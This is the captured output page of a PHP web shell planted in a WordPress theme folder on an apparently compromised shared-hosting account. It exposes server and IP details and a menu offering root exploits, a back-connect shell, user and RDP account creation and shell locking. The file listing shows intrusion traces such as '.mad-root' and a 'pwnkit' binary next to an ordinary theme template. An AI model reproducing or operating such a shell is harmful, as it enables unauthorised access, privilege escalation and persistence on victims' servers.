Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
sento /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
licenses
[ DIR ]
drwxr-xr-x
styles
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
182
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive.php
1.14
KB
-rw-r--r--
comments.php
3.41
KB
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
content-page.php
194
B
-rw-r--r--
content-search.php
706
B
-rw-r--r--
content-single.php
376
B
-rw-r--r--
content.php
801
B
-rw-r--r--
footer.php
980
B
-rw-r--r--
functions.php
11.18
KB
-rw-r--r--
functionsbak.php
10.69
KB
-rw-r--r--
header.php
3.1
KB
-rw-r--r--
image.php
2.99
KB
-rw-r--r--
index.php
111
B
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
no-results.php
1.05
KB
-rw-r--r--
page.php
410
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
13.77
KB
-rw-r--r--
screenshot.png
246.88
KB
-rw-r--r--
search.php
462
B
-rw-r--r--
searchform.php
473
B
-rw-r--r--
sidebar.php
873
B
-rw-r--r--
single.php
597
B
-rw-r--r--
style.css
141.11
KB
-rw-r--r--
template-sitemap.php
1.69
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : template-sitemap.php
<?php /** * Template Name: Sitemap * * @package Sento */ get_header(); ?> <div class="one_half"> <h3 class="page-title"><?php _e( 'Pages', 'sento'); ?>:</h3> <ul class="sitemap-pages"> <?php wp_list_pages('title_li='); ?> </ul> <h3 class="page-title"><?php _e( 'Author(s)', 'sento'); ?>:</h3> <ul class="sitemap-authors"> <?php wp_list_authors( 'optioncount=1' ); ?> </ul> </div> <div class="one_half last"> <h3 class="page-title"><?php _e( 'Posts', 'sento'); ?>:</h3> <ul class="sitemap-posts"> <?php $args=array( 'orderby' => 'name', 'pad_counts' => '1' ); $cats = get_categories( $args ); foreach ( $cats as $cat ) { $loop = new WP_Query('posts_per_page=-1&cat='.$cat->cat_ID); echo '<li class="category"><a href="' . get_category_link($cat->term_id) . '">' . __( 'Category:', 'sento' ) . ' ' . $cat->cat_name . ' (' . $cat->category_count . ')' . "\n"; echo '<ul class="children">'."\n"; while($loop->have_posts() ) : $loop->the_post(); $category = get_the_category(); ?> <li><a href="<?php the_permalink() ?>" title="<?php _e( 'Permanent Link to', 'sento' ); ?>: <?php the_title(); ?>"> <?php the_title(); ?></a></li> <?php endwhile; wp_reset_query(); ?> </ul> </li> <?php } ?> </ul> <?php wp_reset_query(); ?> <h3 class="page-title"><?php _e( 'Archives', 'sento'); ?>:</h3> <ul class="sitemap-archives"> <?php wp_get_archives('type=monthly&show_post_count=true'); ?> </ul> </div><div class="clearboth"></div> <?php get_footer(); ?>
Close